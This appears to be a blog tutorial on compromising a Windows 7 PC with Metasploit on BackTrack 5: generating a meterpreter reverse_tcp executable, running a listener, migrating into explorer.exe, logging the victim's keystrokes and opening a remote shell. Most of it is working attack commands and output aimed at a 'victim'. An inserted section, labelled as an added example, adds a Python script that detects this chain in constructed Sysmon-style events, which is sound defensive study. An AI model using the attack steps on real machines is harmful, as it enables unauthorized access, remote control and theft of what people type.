
Exploit Win7 Remote PC: MetaSploit Framework

Hello friends, today I'll show you how you can exploit a Windows 7 PC using Metasploit on BackTrack 5.

What is BackTrack?
BackTrack is a Linux-based penetration testing arsenal that helps security professionals perform assessments in a native environment dedicated to hacking.
Whether you install BackTrack to disk, boot it from a Live DVD or run it from a thumb drive, the penetration testing distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

How to Exploit?
Let's start exploiting a Windows 7 PC using the Metasploit Framework.

What is Metasploit?

Metasploit is the world's most used penetration testing software.

Okay, now start your BackTrack 5 and type startx to enter GUI mode.

root@Way2Computerworld:~#startx

By default the username and password is
Username: root
Pass: toor

To find your local IP, open the Terminal (bottom left of the taskbar) and type:
root@Way2Computerworld:~#ifconfig

Launch msfconsole by going to Applications>>Backtrack>>Exploitation Tools>>Network Exploitation Tools>>Metasploit Framework>>msfconsole



Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window and type in : cd -P /opt/framework3/msf3


root@Way2Computerworld:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=anyportno X > /root/reverse_tcp.exe
LHOST is the local IP you noted earlier. LPORT can be any port you like, but it must be the same port you set on the handler below (4444 in this post). The X option tells msfpayload to output a Windows executable.

You will see output like this (screenshot of the msfpayload output not included):

The generated reverse_tcp.exe is now in /root on your BackTrack machine.


Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
LHOST => xxx.xxx.xxx.xxx

msf exploit(handler) > set LPORT 4444
LPORT => 4444



Everything is now configured. You have an executable that makes a reverse connection back to you,
and you have set the handler to listen for the meterpreter session on port 4444.
The last step is to type "exploit" and press Enter:
msf exploit(handler) > exploit


You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Find the PID of explorer.exe in the list and migrate into that process (2028 in this example):


meterpreter > migrate 2028
[*] Migrating to 2028…
[*] Migration completed successfully.
meterpreter >


Type in the following:
meterpreter > use priv


Now, if you want to start the keylogger on the victim, just type keyscan_start.

If you want a command prompt on the victim's computer,
just type shell:
meterpreter > shell
Process 844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>


You now have a command prompt on the victim.
Type whoami to see the victim's computer name and the user account you are running as:
C:\Windows\system32>whoami
whoami
Way2Computerworld-pc\hacker
C:\Windows\system32>



Let's suppose you want to start Notepad on the victim's computer.
Type: notepad.exe
Now suppose the victim has typed something on his computer.
Type exit to return to meterpreter.
Then type keyscan_dump to see all the captured keystrokes:
meterpreter > keyscan_dump
Dumping captured keystrokes…
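From the defender's side, the chain above leaves a recognizable trail in endpoint telemetry: an unknown binary opens an outbound TCP connection to the handler port, that binary then creates a remote thread in explorer.exe (what migrate does under the hood), and cmd.exe is spawned as a child of the injected explorer.exe when shell is run. The following correlation script is an added example, not part of the original post or of Metasploit; it runs over constructed Sysmon-style records (field names follow Sysmon event IDs 1, 3 and 8; the PIDs 2028 and 844 are reused from the post, and the IP 192.0.2.10, the file paths and the benign noise events are made up).

```python
"""Correlate constructed Sysmon-style events for a meterpreter reverse_tcp
session that migrates into explorer.exe and then spawns a shell.
Added example; the events below are constructed, not real telemetry."""
import ntpath

# Image paths under these prefixes are treated as "expected" binaries.
# Constructed heuristic for the example; real allow-lists are richer.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}

# Constructed sample events. Field names follow Sysmon:
#   EventID 1 = ProcessCreate, 3 = NetworkConnect, 8 = CreateRemoteThread
SAMPLE_EVENTS = [
    # payload launched by the user from explorer.exe (PID 2028 as in the post)
    {"EventID": 1, "ProcessId": 1500,
     "Image": r"C:\Users\hacker\Downloads\reverse_tcp.exe",
     "ParentProcessId": 2028, "ParentImage": r"C:\Windows\explorer.exe"},
    # reverse connection to the handler on port 4444 (IP is a documentation address)
    {"EventID": 3, "ProcessId": 1500,
     "Image": r"C:\Users\hacker\Downloads\reverse_tcp.exe",
     "Initiated": True, "DestinationIp": "192.0.2.10", "DestinationPort": 4444},
    # benign noise: a browser talking HTTPS
    {"EventID": 3, "ProcessId": 3100,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Initiated": True, "DestinationIp": "198.51.100.5", "DestinationPort": 443},
    # "migrate 2028": remote thread created in explorer.exe
    {"EventID": 8, "SourceProcessId": 1500,
     "SourceImage": r"C:\Users\hacker\Downloads\reverse_tcp.exe",
     "TargetProcessId": 2028, "TargetImage": r"C:\Windows\explorer.exe"},
    # benign noise: user opens notepad from the desktop
    {"EventID": 1, "ProcessId": 3400, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessId": 2028, "ParentImage": r"C:\Windows\explorer.exe"},
    # "shell": cmd.exe (PID 844 as in the post) spawned from the injected explorer.exe
    {"EventID": 1, "ProcessId": 844, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentProcessId": 2028, "ParentImage": r"C:\Windows\explorer.exe"},
]


def is_trusted_path(image):
    """True if the image lives under a prefix we treat as expected."""
    return image.lower().startswith(TRUSTED_PREFIXES)


def correlate(events):
    """Walk events in time order and return the stages of the chain that
    were observed: connect -> migrate -> shell. Each finding is a dict."""
    findings = []
    beaconing = set()   # PIDs that made a suspicious outbound connection
    injected = set()    # PIDs that received a remote thread from a beaconing PID
    for ev in events:
        eid = ev["EventID"]
        if eid == 3 and ev.get("Initiated") and not is_trusted_path(ev["Image"]):
            beaconing.add(ev["ProcessId"])
            findings.append({
                "stage": "connect", "pid": ev["ProcessId"],
                "detail": "%s -> %s:%d" % (ntpath.basename(ev["Image"]),
                                           ev["DestinationIp"], ev["DestinationPort"])})
        elif eid == 8 and ev["SourceProcessId"] in beaconing:
            injected.add(ev["TargetProcessId"])
            findings.append({
                "stage": "migrate", "pid": ev["TargetProcessId"],
                "detail": "%s injected a thread into %s" % (
                    ntpath.basename(ev["SourceImage"]), ntpath.basename(ev["TargetImage"]))})
        elif (eid == 1 and ev["ParentProcessId"] in injected
              and ntpath.basename(ev["Image"]).lower() in SHELL_IMAGES):
            findings.append({
                "stage": "shell", "pid": ev["ProcessId"],
                "detail": "%s spawned by injected %s" % (
                    ntpath.basename(ev["Image"]), ntpath.basename(ev["ParentImage"]))})
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print("[%s] pid %d: %s" % (f["stage"], f["pid"], f["detail"]))
```

The value of the correlation is that none of the three events is conclusive alone (explorer.exe launching cmd.exe or notepad.exe is everyday activity), but an outbound connection from an untrusted path followed by a remote thread into a long-lived process and a shell from that process matches exactly the sequence this post walks through. Note that the chrome.exe connection and the notepad.exe launch in the sample are deliberately left unflagged.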


You Are Done!



Hope you liked my post. Share with your friends...